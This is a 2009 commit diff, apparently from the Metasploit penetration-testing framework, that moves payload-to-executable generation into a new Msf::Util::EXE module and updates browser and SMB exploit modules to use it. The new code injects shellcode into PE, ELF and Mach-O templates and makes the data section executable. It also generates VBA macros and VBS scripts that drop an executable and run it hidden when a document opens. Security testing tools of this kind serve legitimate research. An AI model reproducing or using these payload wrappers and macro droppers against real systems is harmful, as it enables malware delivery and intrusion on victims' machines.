Update executable template and API

git-svn-id: file:///home/svn/framework3/trunk@6682 4d416f70-5f16-0410-b530-b9f4589650da
2009-06-20 17:42:17 +00:00 · 2009-06-20 17:42:17 +00:00 · 2283e0ffe4
parent cd12fc0ca2
commit 2283e0ffe4
17 changed files with 705 additions and 36 deletions
--- a/data/templates/template.exe
+++ b/data/templates/template.exe
--- a/data/templates/template.s
+++ b/data/templates/template.s
--- a/lib/msf/base.rb
+++ b/lib/msf/base.rb
@ -34,3 +34,6 @@ require 'msf/base/serializer/readable_text'

 # Persistent Storage
 require 'msf/base/persistent_storage'
+
+# Utilities
+require 'msf/util'
--- a/lib/msf/util.rb
+++ b/lib/msf/util.rb
@ -0,0 +1,22 @@
+###
+#
+# framework-util
+# --------------
+#
+# The util library miscellaneous routines that involve the framework
+# API, but are not directly related to the core/base/ui structure.
+#
+###
+
+
+require 'msf/core'
+require 'rex'
+
+module Msf
+module Util
+
+end
+end
+
+# Executable generation and encoding
+require 'msf/util/exe'
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@ -0,0 +1,322 @@
+###
+#
+# framework-util-exe
+# --------------
+#
+# The class provides methods for creating and encoding executable file 
+# formats for various platforms. It is a replacement for the previous
+# code in Rex::Text
+#
+###
+
+module Msf
+module Util
+class EXE
+
+
+	##
+	#
+	# Executable generators
+	#
+	##
+	
+	def self.to_executable(framework, arch, plat, code='')
+		if (arch.index(ARCH_X86))
+
+			if (plat.index(Msf::Module::Platform::Windows))
+				return to_win32pe(framework, code)
+			end
+
+			if (plat.index(Msf::Module::Platform::Linux))
+				return to_linux_x86_elf(framework, code)
+			end
+			
+			if(plat.index(Msf::Module::Platform::OSX))
+				return to_osx_x86_macho(framework, code)		
+			end	
+			
+			# XXX: Add remaining x86 systems here					
+		end
+
+		if(arch.index(ARCH_ARMLE))
+			if(plat.index(Msf::Module::Platform::OSX))
+				return to_osx_arm_macho(framework, code)		
+			end
+			# XXX: Add Linux here
+		end
+
+		if(arch.index(ARCH_PPC))
+			if(plat.index(Msf::Module::Platform::OSX))
+				return to_osx_ppc_macho(framework, code)	
+			end
+			# XXX: Add PPC OS X and Linux here			
+		end						
+		nil
+	end
+
+	
+	def self.to_win32pe(framework, code)
+		pe = ''
+
+		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "..", "data", "templates", "template.exe"), "rb")
+		pe = fd.read(fd.stat.size)
+		fd.close
+
+		if(code.length < 8192)
+			code << Rex::Text.rand_text(8192-code.length)
+		end
+		
+		bo = pe.index('PAYLOAD:')
+		pe[bo,  8192] = code if bo
+		pe[136,    4] = [rand(0x100000000)].pack('V')
+
+		ci = pe.index("\x31\xc9" * 160)
+		cd = pe.index("\x31\xc9" * 160, ci + 320)
+		rc = pe[ci+320, cd-ci-320]
+		
+		# 640 + rc.length bytes of room to store an encoded rc at offset ci
+		enc = encode_stub(framework, [ARCH_X86], rc)
+		lft = 640+rc.length - enc.length
+
+		buf = enc + Rex::Text.rand_text(640+rc.length - enc.length)
+		pe[ci, buf.length] = buf
+		
+		# Make the data section executable
+		xi = pe.index([0xc0300040].pack('V'))
+		pe[xi,4] = [0xe0300020].pack('V')
+		
+		# Add a couple random bytes for fun
+		pe << Rex::Text.rand_text(rand(4096)+128)
+
+		return pe
+	end
+
+	def self.to_win32pe_service(framework, code, name="SERVICENAME")
+		pe = ''
+
+		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "..", "data", "templates", "service.exe"), "rb")
+		pe = fd.read(fd.stat.size)
+		fd.close
+
+		bo = pe.index('PAYLOAD:')
+		pe[bo, 8192] = [code].pack('a8192') if bo
+
+		bo = pe.index('SERVICENAME')
+		pe[bo, 11] = [name].pack('a11') if bo
+		
+		pe[136, 4] = [rand(0x100000000)].pack('V')
+
+		return pe
+	end
+	
+	def self.to_osx_arm_macho(framework, code)
+		mo = ''
+
+		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "..", "data", "templates", "template_armle_darwin.bin"), "rb")
+		mo = fd.read(fd.stat.size)
+		fd.close
+
+		bo = mo.index( "\x90\x90\x90\x90" * 1024 )
+		co = mo.index( " " * 512 )
+
+		mo[bo, 8192] = [code].pack('a8192') if bo
+		mo[co, 512]  = [note].pack('a512') if co
+
+		return mo
+	end
+
+	def self.to_osx_ppc_macho(framework, code)
+		mo = ''
+
+		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "..", "data", "templates", "template_ppc_darwin.bin"), "rb")
+		mo = fd.read(fd.stat.size)
+		fd.close
+
+		bo = mo.index( "\x90\x90\x90\x90" * 1024 )
+		co = mo.index( " " * 512 )
+
+		mo[bo, 8192] = [code].pack('a8192') if bo
+		mo[co, 512]  = [note].pack('a512') if co
+
+		return mo
+	end
+	
+	def self.to_osx_x86_macho(framework, code)
+		mo = ''
+
+		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "..", "data", "templates", "template_x86_darwin.bin"), "rb")
+		mo = fd.read(fd.stat.size)
+		fd.close
+
+		bo = mo.index( "\x90\x90\x90\x90" * 1024 )
+		co = mo.index( " " * 512 )
+
+		mo[bo, 8192] = [code].pack('a8192') if bo
+		mo[co, 512]  = [note].pack('a512') if co
+
+		return mo
+	end
+		
+	def self.to_linux_x86_elf(framework, code)
+		mo = ''
+
+		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "..", "data", "templates", "template_x86_linux.bin"), "rb")
+		mo = fd.read(fd.stat.size)
+		fd.close
+
+		bo = mo.index( "\x90\x90\x90\x90" * 1024 )
+		co = mo.index( " " * 512 )
+
+		mo[bo, 8192] = [code].pack('a8192') if bo
+		mo[co, 512]  = [note].pack('a512') if co
+
+		return mo
+	end
+
+	def self.to_exe_vba(exe='')
+		vba = ""
+		pcs = (exe.length/2000)+1
+		idx = 0
+		
+		var_base_idx = 0
+		var_base     =  Rex::Text.rand_text_alpha(2).capitalize
+		
+		var_bytes = var_base + (var_base_idx+=1).to_s
+		var_initx = var_base +  Rex::Text.rand_text_alpha(1) + (var_base_idx+=1).to_s
+		
+		vba << "Dim #{var_bytes}(#{exe.length}) as Byte\r\n\r\n"
+		1.upto(pcs) do |pc|
+			max = 0
+			vba << "Sub #{var_initx}#{pc}()\r\n"
+			
+			while(c = exe[idx] and max < 2000)
+				vba << "\t#{var_bytes}(#{idx}) = &H#{("%.2x" % c).upcase}\r\n"
+				idx += 1
+				max += 1
+			end	
+			vba << "End Sub\r\n"
+		end
+		
+		var_lname = var_base + (var_base_idx+=1).to_s
+		var_lpath = var_base + (var_base_idx+=1).to_s
+		var_appnr = var_base + (var_base_idx+=1).to_s
+		var_datnr = var_base + (var_base_idx+=1).to_s
+		
+		vba << "Sub Auto_Open()\r\n"
+		vba << "\tDim #{var_appnr} As Integer\r\n"
+		vba << "\tDim #{var_datnr} As Integer\r\n"
+		vba << "\tDim #{var_lname} As String\r\n"
+		vba << "\tDim #{var_lpath} As String\r\n"
+		vba << "\t#{var_lname} = \"#{rand_text_alpha(rand(8)+8)}.exe\"\r\n"
+		vba << "\t#{var_lpath} = Environ(\"USERPROFILE\")\r\n"
+		vba << "\tChDrive (#{var_lpath})\r\n"
+		vba << "\tChDir (#{var_lpath})\r\n"
+		vba << "\t#{var_datnr} = FreeFile()\r\n"
+		vba << "\tOpen #{var_lname}  For Binary Access Read Write As #{var_datnr}\r\n"
+		
+		1.upto(pcs) do |pc|
+			vba << "\t#{var_initx}#{pc}\r\n"
+		end
+		
+		vba << "\tPut #{var_datnr}, , #{var_bytes}\r\n"
+		vba << "\tClose #{var_datnr}\r\n"
+		vba << "\t#{var_appnr} = Shell(#{var_lname}, vbHide)\r\n"
+		vba << "End Sub\r\n"
+		
+		vba << "Sub AutoOpen()\r\n"
+		vba << "\tAuto_Open\r\n"
+		vba << "End Sub\r\n"
+		
+		vba << "Sub Workbook_Open()\r\n"
+		vba << "\tAuto_Open\r\n"
+		vba << "End Sub\r\n"
+				
+	end
+
+	def self.to_win32pe_vba(framework, code)
+		to_exe_vba(to_win32pe(framework, code))
+	end
+
+	def self.to_exe_vbs(exe = '')
+		vbs = ""
+
+		var_bytes =  Rex::Text.rand_text_alpha(rand(8)+8)
+		var_fname =  Rex::Text.rand_text_alpha(rand(8)+8)
+		var_func =  Rex::Text.rand_text_alpha(rand(8)+8)
+		var_stream =  Rex::Text.rand_text_alpha(rand(8)+8)
+		var_obj =  Rex::Text.rand_text_alpha(rand(8)+8)
+		var_shell =  Rex::Text.rand_text_alpha(rand(8)+8)
+
+		vbs << "Function #{var_func}()\r\n"
+
+		vbs << "#{var_bytes} = Chr(&H#{("%02x" % exe[0])})"
+		
+		1.upto(exe.length) do |byte|
+			vbs << "&Chr(&H#{("%02x" % exe[byte])})" 
+		end	
+		vbs << "\r\n"
+		
+		vbs << "Dim #{var_obj}\r\n"
+		vbs << "Set #{var_obj} = CreateObject(\"Scripting.FileSystemObject\")\r\n"
+		vbs << "Dim #{var_stream}\r\n"
+		vbs << "Set #{var_stream} = #{var_obj}.CreateTextFile(\"#{var_fname}.exe\")\r\n"
+		vbs << "#{var_stream}.Write #{var_bytes}\r\n"
+		vbs << "#{var_stream}.Close\r\n"
+		vbs << "Dim #{var_shell}\r\n"
+		vbs << "Set #{var_shell} = CreateObject(\"Wscript.Shell\")\r\n"
+		vbs << "#{var_shell}.run(\"#{var_fname}.exe\")\r\n"
+		vbs << "End Function\r\n"
+		vbs << "#{var_func}\r\n"
+	end
+
+	def self.to_win32pe_vbs(framework, code)
+		to_exe_vbs(to_win32pe(framework, code))
+	end
+
+	# Creates a .NET DLL which loads data into memory
+	# at a specified location with read/execute permissions
+	#    - the data will be loaded at: base+0x2065
+	#    - max size is 0x8000 (32768)
+	def self.to_dotnetmem(base=0x12340000, data="")
+		pe = ''
+
+		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "..", "data", "templates", "dotnetmem.dll"), "rb")
+		pe = fd.read(fd.stat.size)
+		fd.close
+
+		# Configure the image base
+		pe[180, 4] = [base].pack('V')
+		
+		# Configure the TimeDateStamp
+		pe[136, 4] = [rand(0x100000000)].pack('V')
+
+		# XXX: Unfortunately we cant make this RWX only RX
+		# Mark this segment as read-execute AND writable
+		# pe[412,4] = [0xe0000020].pack("V")
+		
+		# Write the data into the .text segment
+		pe[0x1065, 0x8000] = [data].pack("a32768")
+		
+		# Generic a randomized UUID
+		pe[37656,16] = Rex::Text.rand_text(16)
+		
+		return pe
+	end
+	
+	
+	def self.encode_stub(framework, arch, code)
+		framework.encoders.each_module_ranked('Arch' => arch) do |name, mod|
+			begin
+				enc = framework.encoders.create(name)
+				raw = enc.encode(code, '')
+				return raw if raw
+			rescue
+			end
+		end
+		nil
+	end
+
+
+end
+end
+end
--- a/lib/rex/text.rb
+++ b/lib/rex/text.rb
@ -565,6 +565,7 @@ module Text
 	#
 	##
 	
+	# XXX: depends on the Msf code being loaded, not just Rex
 	def self.to_executable(arch, plat, code, note='')
 		if (arch.index(ARCH_X86))

@ -608,9 +609,16 @@ module Text
 		fd.close

 		bo = pe.index('PAYLOAD:')
-		pe[bo, 8192] = [code].pack('a8192') if bo
+		pe[bo,  8192] = [code].pack('a8192') if bo
+		pe[136,    4] = [rand(0x100000000)].pack('V')

-		pe[136, 4] = [rand(0x100000000)].pack('V')
+		ci = pe.index("\x31\xc9" * 160)
+		cd = pe.index("\x31\xc9" * 160, ci + 320)
+		rc = pe[ci+320, cd-ci-320]
+		
+		# 640 + rc.length bytes of room to store an encoded rc at offset ci
+		
+		

 		return pe
 	end
--- a/modules/exploits/multi/browser/java_calendar_deserialize.rb
+++ b/modules/exploits/multi/browser/java_calendar_deserialize.rb
@ -110,11 +110,11 @@ class Metasploit3 < Msf::Exploit::Remote
 			else
 			
 				if target['Arch'] == ARCH_X86
-					data = Rex::Text.to_win32pe( payload.encoded ) if target['Platform'] == 'win'
-					data = Rex::Text.to_osx_x86_macho( payload.encoded ) if target['Platform'] == 'osx' 
-					data = Rex::Text.to_linux_x86_elf( payload.encoded ) if target['Platform'] == 'linux'
+					data = Msf::Util::EXE.to_win32pe( payload.encoded ) if target['Platform'] == 'win'
+					data = Msf::Util::EXE.to_osx_x86_macho( payload.encoded ) if target['Platform'] == 'osx' 
+					data = Msf::Util::EXE.to_linux_x86_elf( payload.encoded ) if target['Platform'] == 'linux'
 				elsif target['Arch'] == ARCH_PPC
-					data = Rex::Text.to_osx_ppc_macho( payload.encoded ) if target['Platform'] == 'osx'
+					data = Msf::Util::EXE.to_osx_ppc_macho( payload.encoded ) if target['Platform'] == 'osx'
 				end
 				
 				if data
--- a/modules/exploits/windows/browser/ie_createobject.rb
+++ b/modules/exploits/windows/browser/ie_createobject.rb
@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote

 		if (request.uri.match(/payload/))
 			return if ((p = regenerate_payload(cli)) == nil)
-			data = Rex::Text.to_win32pe(p.encoded, '')
+			data = Msf::Util::EXE.to_win32pe(p.encoded, '')
 			print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
 			send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
 			return
@ -230,4 +230,4 @@ function #{var_func_exploit}( ) {
 		handler(cli)		
 	end

-end
+end
--- a/modules/exploits/windows/browser/ie_unsafe_scripting.rb
+++ b/modules/exploits/windows/browser/ie_unsafe_scripting.rb
@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		
 		p = regenerate_payload(cli);
 		print_status("Request received from #{cli.peerhost}:#{cli.peerport}...");
-		exe = Rex::Text.to_win32pe(p.encoded, '');
+		exe = Msf::Util::EXE.to_win32pe(p.encoded, '');
 		#print_status("Building vbs file...");
 		# Build the content that will end up in the .vbs file
 		vbs_content	= Rex::Text.to_hex(%Q|Dim #{var_origLoc}, s, #{var_byteArray}
--- a/modules/exploits/windows/browser/macrovision_unsafe.rb
+++ b/modules/exploits/windows/browser/macrovision_unsafe.rb
@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote

 		if (request.uri.match(/payload/))
 			return if ((p = regenerate_payload(cli)) == nil)
-			data = Rex::Text.to_win32pe(p.encoded, '')
+			data = Msf::Util::EXE.to_win32pe(p.encoded, '')
 			print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
 			send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
 			return
--- a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb
+++ b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb
@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote

 		if (request.uri.match(/payload/))
 			return if ((p = regenerate_payload(cli)) == nil)
-			data = Rex::Text.to_win32pe(p.encoded, '')
+			data = Msf::Util::EXE.to_win32pe(p.encoded, '')
 			print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
 			send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
 			return
@ -95,4 +95,4 @@ class Metasploit3 < Msf::Exploit::Remote
 		
 	end

-end
+end
--- a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb
+++ b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb
@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote

 		if (request.uri.match(/payload/))
 			return if ((p = regenerate_payload(cli)) == nil)
-			data = Rex::Text.to_win32pe(p.encoded, '')
+			data = Msf::Util::EXE.to_win32pe(p.encoded, '')
 			print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
 			send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
 			return
--- a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb
+++ b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb
@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote

 		if (request.uri.match(/payload/))
 			return if ((p = regenerate_payload(cli)) == nil)
-			data = Rex::Text.to_win32pe(p.encoded, '')
+			data = Msf::Util::EXE.to_win32pe(p.encoded, '')
 			print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
 			send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
 			return
--- a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb
+++ b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb
@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote

 		if (request.uri.match(/payload/))
 			return if ((p = regenerate_payload(cli)) == nil)
-			data = Rex::Text.to_win32pe(p.encoded, '')
+			data = Msf::Util::EXE.to_win32pe(p.encoded, '')
 			print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
 			send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
 			return
@ -89,4 +89,4 @@ class Metasploit3 < Msf::Exploit::Remote
 		
 	end

-end
+end
--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@ -116,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		filename = rand_text_alpha(8) + ".exe"
 		simple.connect("ADMIN$")
 		fd = simple.open("\\#{filename}", 'rwct')
-		fd << Rex::Text.to_win32pe_service(payload.encoded,rand_text_alpha(8))
+		fd << Msf::Util::EXE.to_win32pe_service(payload.encoded,rand_text_alpha(8))
 		fd.close
 		
 		print_status("Created \\#{filename}...")
--- a/modules/exploits/windows/smb/smb_relay.rb
+++ b/modules/exploits/windows/smb/smb_relay.rb
@ -139,7 +139,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("Uploading payload...")
 		filename = rand_text_alpha(8) + ".exe"
 		fd = rclient.open("\\#{filename}", 'rwct')
-		fd << Rex::Text.to_win32pe_service(code.encoded,rand_text_alpha(8))
+		fd << Msf::Util::EXE.to_win32pe_service(code.encoded,rand_text_alpha(8))
 		fd.close
 		print_status("Created \\#{filename}...")
 		
--- a/2
+++ b/2
@ -191,7 +191,7 @@ case cmd
 				
 				case fmt
 				when 'exe'
-					exe = Rex::Text.to_win32pe(raw, "")
+					exe = Msf::Util::EXE.to_win32pe($framework, raw)
 					if(not output)
 						$stdout.write(exe)
 					else